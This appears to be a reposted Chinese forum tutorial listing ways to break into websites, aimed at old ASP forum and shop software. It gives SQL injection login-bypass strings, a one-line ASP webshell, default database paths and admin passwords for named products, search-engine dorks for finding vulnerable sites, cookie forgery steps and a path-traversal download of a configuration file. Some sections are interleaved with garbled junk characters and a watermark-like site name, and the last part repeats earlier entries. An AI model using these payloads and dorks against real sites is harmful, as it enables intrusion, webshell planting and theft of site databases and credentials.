14種可利用的入侵方法
1.上傳漏洞
如果看到:選擇你要上傳的文件 [重新上傳]或者出現“請登陸后使用”,80%就有漏洞了!
有時(shí)上傳不一定會(huì )成功,這是因為Cookies不一樣.我們就要用WSockExpert取得Cookies.再用DOMAIN上傳.
2.注入漏洞
字符過(guò)濾不嚴造成的
3.旁注,也就是跨站.
我們入侵某站時(shí)可能這個(gè)站堅固的無(wú)懈可擊,我們可以找下和這個(gè)站同一服務(wù)器的站點(diǎn),然后在利用這個(gè)站點(diǎn)用提權,嗅探等方法來(lái)入侵我們要入侵的站點(diǎn)。
4.暴庫:把二級目錄中間的/換成%5c
5.’or’=’or’這是一個(gè)可以連接SQL的語(yǔ)名句.可以直接進(jìn)入后臺。我收集了一下。類(lèi)似的還有:
’or’’=’ " or "a"="a ’) or (’a’=’a ") or ("a"="a or 1=1-- ’ or ’a’=’a
6.社會(huì )工程學(xué)。這個(gè)我們都知道吧。就是猜解。
7.寫(xiě)入ASP格式數據庫。就是一句話(huà)木馬〈%execute request("value")%〉(數據庫必需得是ASP或ASA的后綴)
8.源碼利用:一些網(wǎng)站用的都是網(wǎng)上下載的源碼.有的站長(cháng)很懶.什么也不改.
9.默認數據庫/webshell路徑利用:這樣的網(wǎng)站很多/利人別人的WEBSHELL.
/Databackup/dvbbs7.MDB
/bbs/Databackup/dvbbs7.MDB
/bbs/Data/dvbbs7.MDB
/data/dvbbs7.mdb
/bbs/diy.asp
/diy.asp
/bbs/cmd.asp
/bbs/cmd.exe
/bbs/s-u.exe
/bbs/servu.exe
工具:網(wǎng)站獵手 挖掘雞 明小子
10.查看目錄法:人一些網(wǎng)站可以斷開(kāi)目錄,可以方問(wèn)目錄。
210.37.95.65 images
11.工具溢出
12.搜索引擎利用:
(1).inurl:flasher_list.asp 默認數據庫:database/flash.mdb 后臺/manager/
(2).找網(wǎng)站的管理后臺地址:
site:xxxx.comintext:管理
site:xxxx.comintitle:管理 〈關(guān)鍵字很多,自已找〉
site:xxxx.cominurl:login
(3).查找access的數據庫,mssql、mysql的連接文件
allinurl:bbsdata
filetype:mdbinurl:database
filetype:incconn
inurl:datafiletype:mdb
13.COOKIE詐騙:把自己的ID修改成管理員的,MD5密碼也修改成他的,用桂林老兵工具可以修改COOKIE。
14.利用常見(jiàn)的漏洞:如動(dòng)網(wǎng)BBS
可以先用:dvbbs權限提升工具,使自已成為前臺管理員。
THEN,運用:動(dòng)網(wǎng)固頂貼工具,找個(gè)固頂貼,再取得COOKIES,這個(gè)要你自已做。我們可以用WSockExpert取得Cookies/NC包
這個(gè)我就不做了,網(wǎng)上教程多的是,自已下個(gè)看看。
工具:dvbbs權限提升工具 動(dòng)網(wǎng)固頂貼工具
15.還有一些老漏洞。如IIS3,4的查看源碼,5的Delete
CGI,PHP的一些老洞,我就不說(shuō)了啊。。太老了。沒(méi)有什么大用途?!?br>
#######################################
一般入侵思路
腳本注入(ASP PHP JSP)
1.腳本漏洞
其它腳本漏洞(上傳漏洞,跨站漏洞)
域名旁注
2.旁注
“IP”旁注
本地溢出
3.溢出漏洞
遠程溢出
ARP欺騙
4.網(wǎng)絡(luò )竊聽(tīng)
IP欺騙
5.社會(huì )工程學(xué)
一、入侵BBSXP系統:
用到的工具:網(wǎng)站獵手 數據庫小助手 MD5密碼破解工具
n C g j'f D#f關(guān)鍵詞:廣告合作&F.N;n#e#K m
管理員登陸地址:BBS主頁(yè)
:l m;B K9N1a0p whackbbs.tech.topzj.com默認數據庫地址:/DATABASE/BBSXP.MDB*K h;s
二、入侵動(dòng)網(wǎng)論壇用到工具:網(wǎng)站獵手 數據庫小助手 MD5密碼破解工具
x#u e:l
關(guān)鍵詞:powered by dvbbs
&t.u W n F'qT/w |默認數據庫地址:data/dvbbs7.mdb 或者Databackup/dvbbs7.mdb或者bbs/Databackup/dvbbs7.mdb
*f&R N ~+e3j;K n u K.|一流技術(shù)聯(lián)盟【HACKER】或者/bbs/Data/dvbbs7.mdb \ A P R5s W v k
管理員登陸地址:BBS主頁(yè)默認管理員賬號密碼:admin admin888
F#e*Q"A h } x&b.uA'H9o O0V N u4m p/Q
$b K V;c X)X7`hackbbs.tech.topzj.com三、入侵新云系統hackbbs.tech.topzj.com#`5w0M#a*F w I
用到的工具:數據庫小助手 MD5密碼破解工具 挖掘雞 O1m ?0F r ^ L
關(guān)鍵詞:本站所提供的程序均來(lái)自于 Internet(所以無(wú)法保證下載后一定可以安裝管理員登陸地址:/admin/admin_login.asp
+p N q-N9m A7k4N默認數據庫:database/#newasp.mdb(因為加了#在瀏覽器是無(wú)法連接的。所以我們要改成%23)hackbbs.tech.topzj.com c#M b9B x L$g M
database/%23newasp.mdb一流技術(shù)聯(lián)盟【HACKER】,i G A j Ik {
默認管理員賬號密碼:admin admin
四、入侵無(wú)憂(yōu)傳奇系統
【HACKER】用到的工具:網(wǎng)站獵手 數據庫小助手 MD5密碼破解工具
關(guān)鍵字: inurl:Msmir_DownLoads
\*? S'P4V(\
p一流技術(shù)聯(lián)盟【HACKER】默認數據庫地址:數據庫連接:/msmir_net.mdb 或/msmir/msmir.mdb管理員登陸地址:admin.asp
/| o M a(}
[%C q | H4t默認管理員賬號密碼:msmir msmir
o-L7^2K&z d6^ Dhackbbs.tech.topzj.com同上,得到管理員密碼后,再進(jìn)入后臺,發(fā)布新聞,用捉包工具捉包,再用NC提交,得到SHELL,一流技術(shù)聯(lián)盟【HACKER】*e k I;G$] v2D:_p i
u
b @ Y
五、入侵小公司小企業(yè)系統關(guān)鍵詞:inurl:Went.后臺登陸地址:manage/login.asp默認管理員賬號密碼:'or''=''or' 'or''=''or' 一流技術(shù)聯(lián)盟【HACKER】 L&{"e(C v J l
或:admin admin入侵搜索關(guān)鍵字默認數據庫: Databases/myszw.mdb Databases/myszw1.mdb
上傳 upload_Photo.asp?PhotoUrlID=3 upload_Photo.asp?PhotoUrlID=1
----------------------------------------------------
關(guān)鍵字:網(wǎng)站建設公司企業(yè)網(wǎng)站管理系統
后綴: admin/login.asp
---------------------------------------
關(guān)鍵字:網(wǎng)夢(mèng)購物系統 gCS木馬
GOOGLE里搜索關(guān)鍵字:
上面的這個(gè)名字只是該留言者使用的昵稱(chēng),不代表任何管理員身份!
把index.asp換成 mdb/vcsbook.asp
代碼:
---------------------------------------
關(guān)鍵子:inurl:Went.asp
后綴:manage/login.asp
密碼:'or''=''or'
============================
關(guān)鍵字:acblog
blogdata/acblog.asa 默認數據庫。
=======================================
關(guān)鍵字:Copyright ? 2005-2008??Power
然后寫(xiě)入默認數據庫:databass/datashop.asp
在網(wǎng)址后面加上主頁(yè)后面加上:linktianjia.asp
申請連接輸入一句話(huà)代碼:
或者點(diǎn)下面的管理入口 密碼:'or'='or'
一句話(huà)連接的時(shí)候在網(wǎng)站后面加上:databass/datashop.asp
========================================================
關(guān)鍵詞 co net mib ver 1.0 design by hypo
搜索網(wǎng)站
==============================================
新云漏洞:把/flash/downfile.asp?url=uploadfile/../../conn.asp提交到網(wǎng)站根目錄。就可以下載conn.asp 找到數據庫地址比如 www.123.com 這個(gè)站那么數據庫地址就是 http://www.123.com/database\xzws.mdb 大家時(shí)常碰到數據庫如果前面或者中間+了# 可以用%23替換就可以下載了如:#xzws.mdb 改成%23xzws.mdb 那么數據庫就是
http://www.123.com/database\%23xzws.mdb然后下載數據庫
======================================================
網(wǎng)站獵手 一句話(huà)木馬
關(guān)鍵字:Powered by BBSXP 7.00
后綴:DataBase\BBSXP7.mdb
默認后臺:/bbsxp/Login.asp
=====================================
關(guān)鍵字:Management Ver 3.0 Build 20030628
后綴:upload.asp
一:網(wǎng)站獵手 t0/fF'G ZD
二:明小子
三:ASP木馬 =DUs
====================
密碼:'or'='or'
搜索:WEB Manage Ver 1.0
LQT Ver 1.0 Design By wm 6
Web Development By Ver 1.0 Final
Web Management Ver 1.0 Design By Ck8
=====================================
edit.asp?table=
edit.asp?boardname=
action=
cnunews=
news_main&acode=
asp?id=1
asp?id=2
&idx=
edit.asp?idx=
啊D注入工具 百度搜索
=========================
搜索:Co Net MIB Ver 1.0網(wǎng)站后臺管理系統
===============================================
用到工具:挖掘雞
后綴添加:admin/login.asp
搜索關(guān)鍵詞:申請會(huì )員有什么好處?
密碼:'or'='or'
=================================
啊D注入工具--百度----關(guān)鍵子:admin
====================================
挖掘機關(guān)鍵字:Powered by WEBBOY頁(yè)面:/upfile.asp
網(wǎng)站獵手關(guān)鍵字:Powered by mypower 后綴:upfile_photo.asp
upfile_softpic.asp
upfile_adpic.asp
======================
關(guān)鍵字:Power BY:VenShop V7.01 Copyright:VenShop.Com
密碼:'or'='or'
======================= ;:
關(guān)鍵字:powered by mypower
漏洞頁(yè)面:upfile_photo.asp
Upfile_Soft.asp
upfile_adpic.asp
upfile_softpic.asp
===============================
關(guān)鍵字:選購->加入購物車(chē)->去收銀臺->確認收貨人信息->選付款方式->選配送方式->在線(xiàn)支付或下單后匯款->匯款確認->發(fā)貨->完成
漏洞頁(yè)面:upload.asp
upfile_flash.asp
=============================
網(wǎng)上搜索 inurl:manage/login.asp
======================================
關(guān)鍵字:Power BY:VenShop V7.01
后臺地址:ad_login.asp
密碼:'or'='or'
====================
關(guān)鍵字:Powered by WEBBOY
后綴:/upfile.asp
工具:明小子上傳
====================
關(guān)鍵詞:inurl: asp?=數字
inurl: php?=數字
===========================
關(guān)鍵字:went.asp
后綴:manage/login.asp
==========================
添加后綴/msmir_net.mdb
搜索:inurl:Msmir_DownLoads
===============================
關(guān)鍵字Powered By :SMT Version 5.0
后綴:upfile_flash.asp
===========================
關(guān)鍵字:你要入侵的類(lèi)別 inurl:asp
工具:啊D注入工具
==================================
========================================
一、入侵BBSXP系統:
用到的工具:網(wǎng)站獵手 數據庫小助手 MD5密碼破解工具
關(guān)鍵詞:廣告合作
管理員登陸地址:BBS主頁(yè)
默認數據庫地址:/DATABASE/BBSXP.MDB
-----------------------------------------
二、入侵動(dòng)網(wǎng)論壇
用到工具:網(wǎng)站獵手 數據庫小助手 MD5密碼破解工具
關(guān)鍵詞:powered by dvbbs
默認數據庫地址:data/dvbbs7.mdb 或者Databackup/dvbbs7.mdb或者bbs/Databackup/dvbbs7.mdb
或者/bbs/Data/dvbbs7.mdb
管理員登陸地址:BBS主頁(yè)
默認管理員賬號密碼:admin admin888
--------------------------------------
三、入侵新云系統
用到的工具:數據庫小助手 MD5密碼破解工具 挖掘雞 ?N 6'*2{NT
eIEr\X4\~~
關(guān)鍵詞:本站所提供的程序均來(lái)自于 Internet 所以無(wú)法保證下載后一定可以安裝
管理員登陸地址:/admin/admin_login.asp U
默認數據庫:database/#newasp.mdb(因為加了#在瀏覽器是無(wú)法連接的。所以我們要改成%23)
database/%23newasp.mdb
默認管理員賬號密碼:admin admin
-----------------------------------
四、入侵無(wú)憂(yōu)傳奇系統
用到的工具:網(wǎng)站獵手 數據庫小助手 MD5密碼破解工具
關(guān)鍵字: inurl:Msmir_DownLoads
默認數據庫地址:數據庫連接:/msmir_net.mdb 或/msmir/msmir.mdb
管理員登陸地址:admin.asp
默認管理員賬號密碼:msmir msmir